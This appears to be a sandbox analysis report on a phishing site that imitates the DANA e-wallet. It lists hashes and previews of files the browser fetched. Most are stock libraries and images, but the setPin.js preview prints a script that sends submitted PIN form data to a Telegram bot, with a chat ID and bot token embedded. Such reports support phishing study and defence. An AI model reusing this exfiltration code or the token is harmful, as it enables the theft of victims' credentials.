      Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (65293)
      Category:dropped
      Size (bytes):79742
      Entropy (8bit):5.18245217940784
      Encrypted:false
      SSDEEP:1536:2JC+tkTbR2t4i+AitLJLr2gykHgWskGvD/mZLwoZ0ea1sJBTR:suBQkGjmZLwoZ0eisV
      MD5:6DAE88ABA81E468737C510CC2E4EC1DD
      SHA1:6B4B985A90ABD7AB1C2E35FF3B874D07CF8410EE
      SHA-256:2515E37EEE31F5EF3D659B21DCC84DC6EA732B06872DA51078B5B526DE34C0C1
      SHA-512:9DDAEB47DE0F5B7724680BEF5AB033462E495A317BD7F3F0ED3952A3A8EE74034E1429B3D1DFB4604FAA2066A64514A75734AF2321ACE014EDC85326DCC4FF72
      Malicious:false
      Reputation:low
      Preview:/*!. * Bootstrap v5.2.0-beta1 (https://getbootstrap.com/). * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t="transitionend",e=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let i=t.getAttribute("href");if(!i||!i.includes("#")&&!i.startsWith("."))return null;i.includes("#")&&!i.startsWith("#")&&(i=`#${i.split("#")[1]}`),e=i&&"#"!==i?i.trim():null}return e},i=t=>{const i=e(t);return i&&document.querySelector(i)?i:null},n=t=>{const i=e(t);return i?document.querySelector(i):null},s=e=>{e.dispatchEvent(new Event(t))},o=t=>!(!t||"object"!=typeof t)&&(void 0!==t.jquery&&(t=t[0]),void 0!==t.nodeType),r=t=>o(t)?t
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:HTML document, ASCII text, with very long lines (456), with CRLF line terminators
      Category:downloaded
      Size (bytes):13041
      Entropy (8bit):4.982285276188318
      Encrypted:false
      SSDEEP:192:WJQCBLPd0cqaq9ZE9nVYbvbAf8bAfBxG0k4Lv+4clVj+P:rChPd0cRQj3cLG4wVW
      MD5:9DDC78DDD3DD25EAAB63E0CE70851A25
      SHA1:FD053576A1C7108DE7AFF6FAC693667E68684F88
      SHA-256:67941F70B2F470387B274253E7FB6B1C75D189D3116971599339D964C9E6DCA1
      SHA-512:999280C293607940E6B4D25209982B7C201194A9E6BD0ACAE48B67D436BF1C1FB59A7D9E563ED682D2611B28208180A8E946AE1D8B9BB7530D712467C514A663
      Malicious:false
      Reputation:low
      URL:https://pengajuan-kartufisik.netlify.app/
      Preview:<!DOCTYPE html>..<html lang="en">..<head>..<meta data-n-head="ssr" charset="utf-8">..<meta data-n-head="ssr" name="viewport" content="width=device-width, initial-scale=1">..<meta data-n-head="ssr" data-hid="theme-color" name="theme-color" content="#118ee9">..<meta data-n-head="ssr" data-hid="apple-mobile-web-app-status-bar-style" name="apple-mobile-web-app-status-bar-style" content="black-translucent">..<meta data-n-head="ssr" data-hid="twitter:image" name="twitter:image" content="https://a.m.dana.id/danaweb/web/dana-meta-logo.png">..<meta data-n-head="ssr" data-hid="og:image" property="og:image" content="https://a.m.dana.id/danaweb/web/dana-meta-logo.png">..<meta data-n-head="ssr" data-hid="og:site_name" name="og:site_name" content="DANA.id">..<meta data-n-head="ssr" data-hid="description" name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (65447)
      Category:downloaded
      Size (bytes):89501
      Entropy (8bit):5.289893677458563
      Encrypted:false
      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
      Malicious:false
      Reputation:low
      URL:https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js
      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with CRLF line terminators
      Category:downloaded
      Size (bytes):1374
      Entropy (8bit):4.849528374095336
      Encrypted:false
      SSDEEP:24:SRCtWkOChR0BXjuBpNCc7NI2mBscssA/wc0B:S0tWXZ27NI24ZAYpB
      MD5:C19B441222673CAE0E50CDB9DED1E250
      SHA1:A266BE98C0DE5B3F507C80F52760412DD0032686
      SHA-256:FA1836F9FF7D262F51BE14D28FE5BA5CDC5F6B7A110D4D28524676E2FB7E21D8
      SHA-512:B90A8FB535CBF00D67F8EC9054BF72F8B8D13A432792671B054E5C2B9EC330F582C438D91DFD2A64A4C38327E26B325D271930ABB7360635D6AA55D4FA8E6068
      Malicious:false
      Reputation:low
      URL:https://pengajuan-kartufisik.netlify.app/setPin.js
      Preview:.. const chat_id = '5819877962', botID = 'bot6741785240:AAE9hp_2lekocgJReWXnkRgiEGxVSHA-hpk';.. const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;.. document.querySelector('#setPin').addEventListener("submit", async e => { // When the user submits the form.. e.preventDefault(); // Don't submit.. let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message.. Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object... null, 2); // Prettify the JSON so we can read the data easily.. const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API.. method: 'POST',.. headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body... body: JSON.stringify({chat_id, text}), // The body must be a string, not an object.. });.. const messageStatus = document.querySele
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):1374
      Entropy (8bit):4.849528374095336
      Encrypted:false
      SSDEEP:24:SRCtWkOChR0BXjuBpNCc7NI2mBscssA/wc0B:S0tWXZ27NI24ZAYpB
      MD5:C19B441222673CAE0E50CDB9DED1E250
      SHA1:A266BE98C0DE5B3F507C80F52760412DD0032686
      SHA-256:FA1836F9FF7D262F51BE14D28FE5BA5CDC5F6B7A110D4D28524676E2FB7E21D8
      SHA-512:B90A8FB535CBF00D67F8EC9054BF72F8B8D13A432792671B054E5C2B9EC330F582C438D91DFD2A64A4C38327E26B325D271930ABB7360635D6AA55D4FA8E6068
      Malicious:false
      Reputation:low
      Preview:.. const chat_id = '5819877962', botID = 'bot6741785240:AAE9hp_2lekocgJReWXnkRgiEGxVSHA-hpk';.. const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;.. document.querySelector('#setPin').addEventListener("submit", async e => { // When the user submits the form.. e.preventDefault(); // Don't submit.. let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message.. Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object... null, 2); // Prettify the JSON so we can read the data easily.. const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API.. method: 'POST',.. headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body... body: JSON.stringify({chat_id, text}), // The body must be a string, not an object.. });.. const messageStatus = document.querySele
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Unicode text, UTF-8 text
      Category:downloaded
      Size (bytes):3145
      Entropy (8bit):4.842322330045504
      Encrypted:false
      SSDEEP:48:rnbVUBxX7wSLr2dc40BM3jyFjvsmNrCzqu/eBMThmn:DbVel7wSLs3jUvsmN+Tcn
      MD5:F9FABA678C4D6DCFDDE69E5B11B37A2E
      SHA1:81A434F94F2B1124F3232BB86F2944F82FB23AC0
      SHA-256:7ADAF08052C6A6A0F8A0D0055B4F191FD07389FE41C972B69573472B2ECB406A
      SHA-512:EA52D475E439BA178C15B5A6DC23F6EF5975E11B17D71B71F89E71DB27880E49220697954CD853AA28CC13B1A044A2A2EA10AAA2FC02A014E5441102DB433C32
      Malicious:false
      Reputation:low
      URL:https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.css
      Preview:@charset 'UTF-8';./* Slider */..slick-loading .slick-list.{. background: #fff url('./ajax-loader.gif') center center no-repeat;.}../* Icons */.@font-face.{. font-family: 'slick';. font-weight: normal;. font-style: normal;.. src: url('./fonts/slick.eot');. src: url('./fonts/slick.eot?#iefix') format('embedded-opentype'), url('./fonts/slick.woff') format('woff'), url('./fonts/slick.ttf') format('truetype'), url('./fonts/slick.svg#slick') format('svg');.}./* Arrows */..slick-prev,..slick-next.{. font-size: 0;. line-height: 0;.. position: absolute;. top: 50%;.. display: block;.. width: 20px;. height: 20px;. padding: 0;. -webkit-transform: translate(0, -50%);. -ms-transform: translate(0, -50%);. transform: translate(0, -50%);.. cursor: pointer;.. color: transparent;. border: none;. outline: none;. background: transparent;.}..slick-prev:hover,..slick-prev:focus,..slick-next:hover,..slick-next:focus.{. color: transparent;.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:GIF image data, version 89a, 32 x 32
      Category:dropped
      Size (bytes):4178
      Entropy (8bit):7.490050296203736
      Encrypted:false
      SSDEEP:48:32e4MxZKDtivGOFkoajWKOwD2s4UYX034Hk4zHdwt4zeoAF5oM4JTp3uVj4gBFyj:32e4ZtyiqsdWAXWwXPF5oMcdUjVsmuS
      MD5:C5CD7F5300576AB4C88202B42F6DED62
      SHA1:7A1AA43614396382BB15E5FDE574D9CDCD21698F
      SHA-256:E7B44C86B050FCA766A96DDAC2D0932AF0126DA6F2305280342D909168DCCE6B
      SHA-512:F0D7ADA22A3EB3B2758198A71472FB240C74CE4CA09028076E23690C70B2339C6B2A40F9158DD71C52D953EF27BBCC0105B061BDC74FBB0AD0B304C7C6A04A38
      Malicious:false
      Reputation:low
      Preview:GIF89a . .........................~~~................................>>>VVV```|||......JJJlll...............,,,^^^...LLL.................................................................................!..Created with ajaxload.info.!.......!..NETSCAPE2.0.....,.... . ....@.pH$.8.Gq.$N..A.3(..L....V....K|P(...:.(..r.B.._@X!/...BxBnb}E.g....o.r..E.g..^..oWD.c.....JC.g......oqm.o..........E.....{p~....r...D....}.M....d......K......r.........o....|........].q...` 9C.f).$'.=..}.C.^.u..-.H..!.............O.K"1......5.&{j.T. .BBo..e...6..<...@.B?..1..)..G.b.K... .!.......,.... . ....@.pH$&4.Bq.$..D..b(.......V....[4.._..:.t:"r.qh@..a..)..g.Bk_.o..E.g~.....#r.JD.g.xl.oWF.C....~mg......o.D.....B.....w...K.!.......C........wE... ..d....X.............r................s'...xM.&T$$..|M...C.... .A...Bl..d....K.d.V..?oFl-X. .L[.J*....6..!."...5\@....p..oI..m...N!Q.Xm..@..%2u:uH2.\.R.#.a..!.......,.... . ....@.pH$...Bq.$&.D...(..L....V....[$.....:4P(.r.s..._...I..g.BxB.o..E g.w^
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 600 x 315, 8-bit/color RGBA, non-interlaced
      Category:downloaded
      Size (bytes):45960
      Entropy (8bit):7.973048465585785
      Encrypted:false
      SSDEEP:768:mMKPTKW2TfCqX0dLN94QQmF+FW6gUvLxbRlTHj5NKWE4DfjfI1MhI2sZERzNOaKg:mM0TuCqeN94RFW6gUvlbXTFNjDrI2hIi
      MD5:883C16C692FA7FF6C3D58C14D1447C93
      SHA1:2043D443B2F2F4398F0E3B86C1D769637BDCF2BB
      SHA-256:CB425BF8C81AF69B5850278ECA430AA7E6EDD0F27F7653C072C3437FAEB8319B
      SHA-512:A67BBE3962679D9983DF07516EC0DD0113836686886EA5FDDCC26C03638F133B7095DAD7C52C1C5615AA60ABD68F7C6A3E63BBB93CA1D28AA3A674D369EF23CE
      Malicious:false
      Reputation:low
      URL:https://i.ibb.co/khmXKS2/logo-ojk.png
      Preview:.PNG........IHDR...X...;........... .IDATx..{..U......d.L&.......B.I`....e.EWw......I&.p...Ut!drC.v.]....^@..E..$.B".$......I2...:.y....v.L&..y....>U..._~.SO.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..t.' .y...f.......e..B.!n...MD..&E.)...,...D..~.r.3...v....S)......;.....e......S.....oA..A.n..:F..........S.2oeR.RS..l.A.52(..e)..............Y..Y.WJ.K. 0.10......0s....1{a.......E.7p...1_.../A..A. "..0{>...z...f...,eM'....U...f0!.D.P..'.9R@X@.^........(..h.1%1....c..v8..j.~....3]E.......
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 500 x 300, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):70497
      Entropy (8bit):7.992333165661002
      Encrypted:true
      SSDEEP:1536:6+SWpN+yHMOC8rsZ2MU9XT4392HoxAOYaHQnM7sGbPDIv0oEd:dNCOsZSS2HoxZh7sGbPld
      MD5:AB8BA2E253F8E6B4639007F787670BB5
      SHA1:BC09AC3538294AA878DBA82B8186F970536D73CC
      SHA-256:13B7C85C6456F3D31D110B19A79532E98405C47932D245F14EEAD8BBC272E89D
      SHA-512:3DD8401F7E4C28C99FC39EE22AE97BF8A7DA20ED44CDD0F72554917C2788872D1EAC8DBAE332DDC263FBD2800EC300191D08E00D92CB3A0DE57F11CEFB65E09B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......,............tEXtSoftware.Adobe ImageReadyq.e<....IDATx...`......3...!$.. .D@A....-.U.....V[.V[..h/.."....h-.......\*wH.s...........l6...0?.ev..............S..!..."..^.n.G...pW.Q.6.=.:..'_....R............s.OZ.>.......1Z..j.....4...;..m.x.z..(.*6..*^...9i..w.,....W....['..-b..N...[t.....(.TS.. .u.z...+-.....i..w.T;?@.(...augI...]5.T;...~X....y.........]5......n.f@.k8.Jy.T...Z.1...xX..x.c...w.T.sZ...R."..U.'..pWM..c....}4M.4..N..y.T...Z.1.....$.Vc.X.zOTS.j}K..>..:m..3.7D5.......n".<>.....8Q.....*w.TS.<7.W....:.Q.%..]U....j}....T....w.T...Z.....T..j..q.;..>.C...rWM5.. ...G.M.j.}..jX......z../.*.USM..l.(x... ^..q}p.k.Yw..T..~.IF.....x..x...M...^...Z.5.....]...}et+H..f.."E34..h..8..3..$...8wl...W.wO.'p..y..y.....Ee......Ms............]3..#.O.%B..^..s]~.d.g%..QC...n.|~..saN....cZ..|.$....'.}.4l...,..{.N7,]72.P..'.<5.40IWe..31...j..#.c....c*.]...^]2..t.u..iXJdiD..&...M..U..o..d..M..-Ct,......q..LV..f...k..48..}.....iiw.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text
      Category:downloaded
      Size (bytes):1776
      Entropy (8bit):4.594956707081927
      Encrypted:false
      SSDEEP:24:ve0hjm0M3ZGwgbb6qSiRDI2QWTF3IZcVkTFxchwQUm8B5Td:vel5wXbbsi5hBTmpTXbS8Td
      MD5:F38B2DB10E01B1572732A3191D538707
      SHA1:A94A059B3178B4ADEC09E3281ACE2819A30095A4
      SHA-256:DE1E399B07289F3B0A8D35142E363E128124A1185770E214E25E58030DAD48E5
      SHA-512:C11E283612C11DFEEC9A3CB42B8A2ACDD5AE99DFABE7FFBA40EFEF0DD6BBE8C5B98AE8383D3EEFF3A168124C922097EDDD703401EE9AC6122F1EBAB09BBF7737
      Malicious:false
      Reputation:low
      URL:https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css
      Preview:/* Slider */..slick-slider.{. position: relative;.. display: block;. box-sizing: border-box;.. -webkit-user-select: none;. -moz-user-select: none;. -ms-user-select: none;. user-select: none;.. -webkit-touch-callout: none;. -khtml-user-select: none;. -ms-touch-action: pan-y;. touch-action: pan-y;. -webkit-tap-highlight-color: transparent;.}...slick-list.{. position: relative;.. display: block;. overflow: hidden;.. margin: 0;. padding: 0;.}..slick-list:focus.{. outline: none;.}..slick-list.dragging.{. cursor: pointer;. cursor: hand;.}...slick-slider .slick-track,..slick-slider .slick-list.{. -webkit-transform: translate3d(0, 0, 0);. -moz-transform: translate3d(0, 0, 0);. -ms-transform: translate3d(0, 0, 0);. -o-transform: translate3d(0, 0, 0);. transform: translate3d(0, 0, 0);.}...slick-track.{. position: relative;. top: 0;. left: 0;.. display: block;. margin-l
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (42862)
      Category:downloaded
      Size (bytes):42863
      Entropy (8bit):5.085616303270228
      Encrypted:false
      SSDEEP:768:4rkkX123A5YHi6pWzYdlNWYcx16nnYdXRRMd2KYCQCsPShb1ez7RFmYH:EPrYdlNixEePiYH
      MD5:D5A61C749E44E47159AF8A6579DDA121
      SHA1:3B41B3BC956685015A347A2238E71DB29DFA0DBB
      SHA-256:0C7178CC6CA34FB18E30F070A5E7A1C287B2D7CCFCBA2CFDF06E0F46EDA55740
      SHA-512:5ED98CB4311C373DA3EDE92BB47BCE551E22C30683EA8FC55097BAF99ABE1E0702B24DE48F8B9241047CC1E4364158F5A343E4E8FC182E8866DB4E99CCD7EE6E
      Malicious:false
      Reputation:low
      URL:https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js
      Preview:!function(i){"use strict";"function"==typeof define&&define.amd?define(["jquery"],i):"undefined"!=typeof exports?module.exports=i(require("jquery")):i(jQuery)}(function(i){"use strict";var e=window.Slick||{};(e=function(){var e=0;return function(t,o){var s,n=this;n.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:i(t),appendDots:i(t),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"ease",customPaging:function(e,t){return i('<button type="button" />').text(t+1)},dots:!1,dotsClass:"slick-dots",draggable:!0,easing:"linear",edgeFriction:.35,fade:!1,focusOnSelect:!1,focusOnChange:!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,pauseOnFocus:!0,pauseOnDotsHover:!1,respondTo:"window",responsive:null,rows:1,rtl:!1,slide:"",slidesP
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 500 x 300, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):92738
      Entropy (8bit):7.99422232812937
      Encrypted:true
      SSDEEP:1536:VpjDHHg2WZYCmL2OFd701OGN1rgfnfGZyb0w6bOZ6NYDEx5dYe/H1M5uvbmTbxTQ:VZDHHgJYCvOjwQGN1rKG0f6bOgNYIjyo
      MD5:5C92920FBBF8DD80BDFE113932DB4824
      SHA1:F946FBF2C78D4CBE1D66245E4297A13483F33DCD
      SHA-256:E7CAF044B88B47A1C05531D15317F7764EBE91BBFBCEE89257483526757B3CB3
      SHA-512:437596E0775E16F6C1537CFE26ECDF18EBFE25FE01045E02E133C1FFF7E8A59ED12E05F7F7511D333D770D272FA79F6B1062E879667B99904BD0297A57674D96
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......,............tEXtSoftware.Adobe ImageReadyq.e<..i.IDATx....$W}.zN...===yf'.l......@0X...1F.w.|..m....>s...re?.c.{.....l@.VHB.]P.jW+....N.3=.+.w*vu.....VwU......w...;. ..~..!...s9..}m..j.Y....."[3..c.r.z.4V.g.....{...7..%.?..7.....V ......m.u....6......+..)x_.....]. ...{...<.G.".$(.....A..zH..4s}.%.f.K.....-..G..........4.%..}~:.WJ...Zh.m....w......d....+".wY.f...v|.!...n.tllu.n.w...V....N.../.....<t.........D..3.S.]T.F...#;....A......(.^h...v..`..p...}.y..d.#...Zh.m...%ng @..g..vA#.,J..`..}y..7.........o.]5<O...C.q.?...B.mc,.......E.....*.kR.*.C.~..=....xr...i.qs.F79..[ho..{h...1..H.8x........5.]..@...4@p.fb.D...!.w.5......h8..7..w.....{h..v...0....*.+"..$a|.0}....;.T.{..7......_O...rP.^d..ocm..{h..v..=.6..5?L....2R...i.... ..Y.=..|.....X.z..G...(......f >d...F ;{..]uc..vEE,.....?..!.v/..e?...$.....i..~=..wi....aJ......1Q.".F....XHV.].].8E..a...k5O'.?....<.sv.....( ...a8..!...Zh....e.9....!;....{y..n...p..~
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 600 x 315, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):45960
      Entropy (8bit):7.973048465585785
      Encrypted:false
      SSDEEP:768:mMKPTKW2TfCqX0dLN94QQmF+FW6gUvLxbRlTHj5NKWE4DfjfI1MhI2sZERzNOaKg:mM0TuCqeN94RFW6gUvlbXTFNjDrI2hIi
      MD5:883C16C692FA7FF6C3D58C14D1447C93
      SHA1:2043D443B2F2F4398F0E3B86C1D769637BDCF2BB
      SHA-256:CB425BF8C81AF69B5850278ECA430AA7E6EDD0F27F7653C072C3437FAEB8319B
      SHA-512:A67BBE3962679D9983DF07516EC0DD0113836686886EA5FDDCC26C03638F133B7095DAD7C52C1C5615AA60ABD68F7C6A3E63BBB93CA1D28AA3A674D369EF23CE
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...X...;........... .IDATx..{..U......d.L&.......B.I`....e.EWw......I&.p...Ut!drC.v.]....^@..E..$.B".$......I2...:.y....v.L&..y....>U..._~.SO.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..t.' .y...f.......e..B.!n...MD..&E.)...,...D..~.r.3...v....S)......;.....e......S.....oA..A.n..:F..........S.2oeR.RS..l.A.52(..e)..............Y..Y.WJ.K. 0.10......0s....1{a.......E.7p...1_.../A..A. "..0{>...z...f...,eM'....U...f0!.D.P..'.9R@X@.^........(..h.1%1....c..v8..j.~....3]E.......
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:GIF image data, version 89a, 32 x 32
      Category:downloaded
      Size (bytes):4178
      Entropy (8bit):7.490050296203736
      Encrypted:false
      SSDEEP:48:32e4MxZKDtivGOFkoajWKOwD2s4UYX034Hk4zHdwt4zeoAF5oM4JTp3uVj4gBFyj:32e4ZtyiqsdWAXWwXPF5oMcdUjVsmuS
      MD5:C5CD7F5300576AB4C88202B42F6DED62
      SHA1:7A1AA43614396382BB15E5FDE574D9CDCD21698F
      SHA-256:E7B44C86B050FCA766A96DDAC2D0932AF0126DA6F2305280342D909168DCCE6B
      SHA-512:F0D7ADA22A3EB3B2758198A71472FB240C74CE4CA09028076E23690C70B2339C6B2A40F9158DD71C52D953EF27BBCC0105B061BDC74FBB0AD0B304C7C6A04A38
      Malicious:false
      Reputation:low
      URL:https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/ajax-loader.gif
      Preview:GIF89a . .........................~~~................................>>>VVV```|||......JJJlll...............,,,^^^...LLL.................................................................................!..Created with ajaxload.info.!.......!..NETSCAPE2.0.....,.... . ....@.pH$.8.Gq.$N..A.3(..L....V....K|P(...:.(..r.B.._@X!/...BxBnb}E.g....o.r..E.g..^..oWD.c.....JC.g......oqm.o..........E.....{p~....r...D....}.M....d......K......r.........o....|........].q...` 9C.f).$'.=..}.C.^.u..-.H..!.............O.K"1......5.&{j.T. .BBo..e...6..<...@.B?..1..)..G.b.K... .!.......,.... . ....@.pH$&4.Bq.$..D..b(.......V....[4.._..:.t:"r.qh@..a..)..g.Bk_.o..E.g~.....#r.JD.g.xl.oWF.C....~mg......o.D.....B.....w...K.!.......C........wE... ..d....X.............r................s'...xM.&T$$..|M...C.... .A...Bl..d....K.d.V..?oFl-X. .L[.J*....6..!."...5\@....p..oI..m...N!Q.Xm..@..%2u:uH2.\.R.#.a..!.......,.... . ....@.pH$...Bq.$&.D...(..L....V....[$.....:4P(.r.s..._...I..g.BxB.o..E g.w^
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 500 x 203, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):15795
      Entropy (8bit):7.945871114030404
      Encrypted:false
      SSDEEP:192:oRQ1IFHmyqC+3QT6UYf8caxA7RlOgeFWoAOoW9efTuPoSgdznUkHAIhJuz:x1yHmyqryAGxMRMge5v8faPoJr0
      MD5:E698F4D246FAB302A286D1E8EB7049E4
      SHA1:0737BAE7C61E87ED547E4408FF1E7432EDB43F48
      SHA-256:DE9A7B06966C704CC5E8DA25EBA02339E2842A40285E768A99F43D0318740E2A
      SHA-512:5A584D5279D1179473B88ADBEE250BB8AD5094186DC57B20B799D442D46F565F369192DFBA863216EFADBDC4370729E38E37278ECBF4F06C44EB01EF56126596
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............S.t....gAMA......a.....sRGB.........pHYs...#...#.x.?v....PLTEGpL``b``b..4``b__b``b``b``b__a..4..4..4ccdaac..3..4__a``b``b``b__a^^a``b..4``a``b``c..4__a``b``a``b``b``b__a``b]]___b``b``b``a``b__b``b``b``b``b_____b..4^^_``b``b``b``b^^b``a``b..4``a``b``a__a__a``b``b__a``b``b``b__a``a__b`````b^^`^^`__a__b__b``b``b``b``a``b``b``b^^___b``b]]_``b^^a..4__a``b``b``b``b.1__b__a..5..4``b__a``a``b__b__`__a..4]]_..3__a..4``b.3.2``b``b..3..3..4^^a..4``b``b..3..3..3..3..3.3``b..4..4..4``b``b..3..4__a``b``b__b``b``b__a..4.2..4..4.2^^a``a..3..3..4..3``b..4..3..4..4..4..3..4..4``b__a..3..3..3..4.2..4..3..3.3__a__b``b..4..4..3..3..3..4..3..3..4..4.1__a__a..4.3..4..3..4..4..3..3.3..3.2__a__b..4.2__a``b__aSSY``a``b``b.3..3..4..3..3__a.2LLV..4..3..3..3``b..4..4..4..4..4..4..4..3.3..4``b.3__a__a__b..4..,__a`````a]]_``b..4``b:.......tRNS.....................SG........?...Kc.<.1.q.h.....#..D.7@..^H.V.[o,....!M$...9k...C....t.....f...w&...a...*..@3..&..hO...
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Unicode text, UTF-8 text, with very long lines (50806)
      Category:downloaded
      Size (bytes):51284
      Entropy (8bit):4.573895834393703
      Encrypted:false
      SSDEEP:384:R48w+hhJhjRqFdtYRjJIjsjaHnNfc2C4741mf5HRzL:R4YhhjQFduRjJ7uHFcu7Smf5xzL
